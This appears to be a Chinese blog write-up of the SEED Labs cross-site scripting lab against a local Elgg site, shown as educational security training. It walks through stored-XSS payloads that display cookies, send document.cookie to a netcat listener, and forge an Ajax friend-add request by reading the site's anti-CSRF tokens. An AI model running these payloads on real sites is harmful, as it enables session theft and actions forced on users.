【SEED LAB】 Cross-Site Scripting (XSS) Attack With SEED Labs - XSS攻击与练习

已于 2022-11-23 15:34:53 修改
阅读量809 收藏 7
点赞数
分类专栏: LAB 文章标签: xss 前端 javascript
于 2022-11-23 15:34:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jeongon/article/details/127998550
版权

XSS攻击是什么

XSS是Cross Site Scripting(跨站脚本攻击)的缩写,原本应该叫做CSS,但是由于CSS已经是Cascading Style Sheets(层叠样式表)的缩写了,所以最后改成XSS。

XSS一般是攻击者在网站或者邮件中插入一段javascript代码,利用代码实现非开发者意愿的功能。

XSS大体上分为反射型XSS储存型XSS基于DOM的XSS三种。

反射型XSS

当使用者点击包含脚本的URL时,浏览器会向服务器发送请求,服务器会发送包含注入脚本的响应(request)。
在这里插入图片描述

储存型XSS

将注入脚本储存在服务器上,当使用者的浏览器发送请求时,脚本从服务器上传并且执行。
在这里插入图片描述

XSS的威胁

伪造请求

注入JavaScript的代码可以代替用户将HTTP请求发送到服务器。

窃取信息

XSS可以窃取用户的cookies以及网页上的个人信息。

开始实验

环境设置

Elgg wbsite: http://www.xsslabelgg.com
ID: samy(pwd: seedsamy)
ID: Alice(pwd: seedalice)
ID: Charlie(pwd: seedcharlie)

Task 1: Posting a Malicious Message to Display an Alert Window

登录samy,打开samy的个人资料。
在这里插入图片描述

里面可以编辑HTML。
在这里插入图片描述

在HTML编辑中,用JavaScript插入我们想要输出的字符"XSS"

<script>
alert('XSS');
</script>

保存后退回来,可以看到画面成功输出了我们想要的字符串。
在这里插入图片描述

Task 2: Posting a Malicious Message to Display Cookies

这个目标是泄露用户的cookie,很简单这里只需要把打印文字的代码换成输出cookies的代码就可以了。

<script>
alert(document.cookie);
</script>

可以看到成功在屏幕上打印除了用户的cookies。
在这里插入图片描述

Task 3: Stealing Cookies from the Victim’s Machine

上文中提到XSS有伪造请求的威胁,那么要想伪造请求就要先获得用户的cookies。Task 2 中虽然泄露了用户的cookies,但是只是在用户的显示器上打印,我们并没有真正的得到。下面会利用netcat工具窃取用户的cookies,首先用ifconfig命令查看自己的地址。这里要使用lo(loopback)中打印的地址。
在这里插入图片描述

然后写出代码,这个5555的端口不是固定的,只要没有被占用的话哪个都行。然后还是之前的步骤,将这串代码编辑到HTML文本中。

<script>
	document.write('<img src=http://127.0.0.1:5555?c=' + escape(document.cookie) + ' >');
</script>

在终端中输入 nc -l 5555 开始监视,然后登录Alice的账户并访问Samy的空间。这里得到了Alice的cookies。
在这里插入图片描述

Task 4: Becoming the Victim’s Friend

接下来的目标是利用XSS让Alice加Samy为好友。和CSRF时的步骤类似,先用Charlie的账号加Samy为好友然后利用HTTP Header Live工具获得GET请求的格式。
在这里插入图片描述
下面是我们得到的GET请求,可以看见Samy的ID是47。

http://www.xsslabelgg.com/action/friends/add?friend=47&__elgg_ts=1669187347&__elgg_token=FxN6yDVu8lqAkaaI5U_NTQ&__elgg_ts=1669187347&__elgg_token=FxN6yDVu8lqAkaaI5U_NTQ

接下来编写脚本。我们把刚刚获得的信息全部放进去,需要注意的是这串代码多加了tstoken两个变量。这两个变量很重要,但是最后再解释。

<script>
window.onload= function () {
	var Ajax=null;
	
	//为什么需要这两行
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;

	//Construct the HTTP request to add Samyas a friend. 수정
	var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=47"+ts+token;

	//Create and send Ajax request to add friend
	Ajax=new XMLHttpRequest();
	Ajax.open("GET",sendurl,true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	Ajax.send();
}
</script>

回到Samy的主页将代码放进去,然后用Alice再次点开Samy。刷新一下可以看见,Alice成功加Samy为好友,XSS攻击成功。
在这里插入图片描述

为什么要加那两个变量

网页通过加入** __elgg_ts __elgg_token **两个变量随机值来防御被跨站访问伪造攻击,这两个变量会随着网站重新加载而改变。所以我们需要XSS攻击前,先得获取这两个变量的值才能绕过检测进行XSS攻击。

防御机制

XSS攻击还是利用用户输入进行攻击的一种,基于HTML的特性将用户输入转化成代码注入到网页中。一般的做法有输入过滤分离代码与数据等等做法。

头都大了了
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SeedLabs-Web安全-XSSProblem
Anonymity
06-15 756
. List item XSSProblem Problem问答 文章目录XSSProblem问题记录P-1 使用LiveHTTPHeader,我们发现下面的GET请求P-2 使用LiveHTTPHeader,我们发现以下POST请求P-3 在书的清单C.2中(C是XSS章节的章节号;其实际价值取决于您使用的是哪个版本的书),我们在发送之前添加了一张支票修改Samy自己配置文件的Ajax请求。这次检查的主要目的是什么?P-4 为了解决XSS攻击,开发人员决定在浏览器端实现过滤。基本上,开发人员计划在发送数
SeedLabs-Web安全-XSS实验
Anonymity
06-25 4590
SeedLabs-Web安全-XSS实验 文章目录SeedLabs-Web安全-XSS实验前言一、Lab Tasks1.1 熟悉“HTTP Header Live”工具1.2 发布恶意消息以显示警报窗口1.3 发布恶意消息以显示Cookie1.4 从受害者的机器上窃取Cookie 前言 CSRF注入的实验记录 提示:以下是本篇文章正文内容,下面案例可供参考 一、Lab Tasks 1.1 熟悉“HTTP Header Live”工具 在这个实验室中,我们需要构造HTTP请求。找出Elgg中可接受的H
SeedLab——Cross-Site Scripting (XSS) Attack Lab
最新发布
Aft3rGl0w的博客
01-14 991
CSP通过指定允许加载和执行的内容源和资源,限制了浏览器中可以执行的代码。JavaScript可以操作cookie,因此当一个页面存在xss漏洞时,攻击者嵌入的恶意代码就能够完成截获所有访问该页面的cookie,然后将cookie发送给攻击者的服务器的行为,这样攻击者就能使用cookie冒充这些用户的身份了。cookie是存储在客户端的一些键值数据,它用于跟踪和存储有关用户状态、会话和身份验证,因此cookie是浏览器客户端的十分敏感的数据,如果cookie被泄露,就会造成敏感信息的泄露、用户身份的冒用。
SEED Labs 2.0】Cross-Site Scripting Attack Lab
Chenyang的博客
08-25 5095
本文为 SEED Labs 2.0 - Cross-Site Scripting Attack Lab 的实验记录。 实验原理 跨站脚本攻击是指恶意攻击者往 Web 页面里插入恶意 Script 代码,当用户浏览该页之时,嵌入其中 Web 里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。xss 漏洞通常是通过 php 的输出函数将 javascript 代码输出到 html 页面中,通过用户本地浏览器执行的,所以 xss 漏洞关键就是寻找参数未过滤的输出函数。 Task 1: Posting
信息安全 SEED Lab8 Cross-Site Scripting (XSS) Attack Lab
crazyliu的博客
06-12 3620
这个实验主要是利用CSRF攻击来完成一些恶意的操作。由于整个实验过程要用到网站,这里先配置一下。 网站都部署在本地,且用域名访问,所以我们需要现在 /etc/hosts文件中设置域名到 IP 的映射关系。内容如下: 127.0.0.1 www.xsslabelgg.com 网站使用Apache作为服务器,在/etc/apache2/sites-available/000-default.conf配置一下网站主目录,内容如下: <VirtualHost *:80> .
跨站式脚本(Cross-SiteScripting)XSS攻击原理分析第1/4页
10-30
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
XSS.rar_XSS_cross scripting_cross site java_cross site scripting
09-14
Cross Site Scripting
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
利用Express模拟web安全之---xss的攻与防
01-26
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web...
Complete Cross-site Scripting Walkthrough
10-01
Complete Cross-site Scripting Walkthrough
SEED 计算机安全教育实验
12-04
SEED: A Suite of Instructional Laboratories for Computer SEcurity EDucation
复旦大学_软件安全_SEED labs_2-Return_to_libc.zip
06-03
return to libc实验、代码、文档
复旦大学_软件安全_SEED labs_1-Buffer Overflow实验.zip
06-27
复旦大学_软件安全_SEED labs_1-Buffer Overflow实验 是从雪城大学SEED labs上找的实验 资源包括:原始文件夹、攻击代码、实验报告详细版
(SEED-LabCross-Site Scripting (XSS) Attack Lab跨站脚本攻击实验
lunan的博客
02-02 5295
(SEED-LabCross-Site Scripting (XSS) Attack Lab 跨站脚本攻击实验 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2 Lab Environment2.1 The Elgg Web Application2.2 DNS Confifiguration2.3 Apache Confifiguration3 Lab Tasks3.1 Preparation: Getting Familiar w
网络攻防实践实验报告十
qq_48521772的博客
06-02 1611
在本次实践中,我们亲自尝试了一次XSS攻击和SQL注入攻击,发现了常见的输入框中的漏洞,提醒了我们:在开发Web应用的时候,要对从客户端传输的数据进行检查和处理,确保数据的安全,防止因一些漏洞而导致网站受到攻击
XSS攻击-xss-lab(1-18)详细讲解
wrypot的博客
03-29 1378
发现单引号前面的内容被赋值给了value,也就是说单引号是value的闭合字符,构造语句开头一个单引号,后面加一个空格(input标签里面属性直接用空格隔开)所以我们接下来要做得事情是,首先&参数t_sort,然后用双引号闭合value值,接着将type类型从hidden隐藏改为text文本,再用onfocus事件触发js语句,最后别忘了,因为我们用双引号闭合了value,所以value本身有的一个双引号多出来了,我们在onfocus="javascript:alert(123)
【网络攻防技术】实验七—— XSS攻击实验(Elgg)
qq_45755706的博客
03-01 7309
文章目录一、实验题目二、实验步骤及结果配置相关环境Task1: Posting a Malicious Message to Display an Alert WindowTask 2: Posting a Malicious Message to Display CookiesTask 3: Stealing Cookies from the Victim’s MachineTask 4: Becoming the Victim’s FriendTask 5: Modifying the Victim’s
seed lab - web security 2 - xss lab
weixin_57901967的博客
05-28 815
seed lab - web security 2 - xss lab 1. Lab Setup same as csrf lab. 2. xss Attack - add friend 2.1 Vim “xssaddfriend.txt”: var sendurl=“http://www.xsslabelgg.com/action/friends/add”+"?friend=47"+token+ts; Ajax.open(“GET”,sendurl,true); 2.2 Run firefox, visi
[SEEDLab]竞争条件漏洞(Race Condition Vulnerability)
HananoYousei的博客
07-06 4469
[SEEDLab]竞争条件漏洞(Race Condition Vulnerability) Introduction 我们首先考虑这样的一个情景,我们有一个名为test的文件,它具有这样的权限: -rwsr-xr-x 1 root seed 40 Jun 9 22:45 test 作为seed用户,我们无法对于此文件进行写入: 但是,假设我们的系统中存在一个程序setuid_modifi...
Vulnerability classifications CWE-16: Configuration CWE-436: Interpretation Conflict CAPEC-63: Cross-Site Scripting (XSS)表示什么
06-09
这段文字列出了三种安全漏洞分类: 1. CWE-16: Configuration,即...3. CAPEC-63: Cross-Site Scripting (XSS),即跨站脚本攻击,指的是攻击者通过在网页中注入恶意脚本来窃取用户信息或执行其他恶意操作的攻击方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值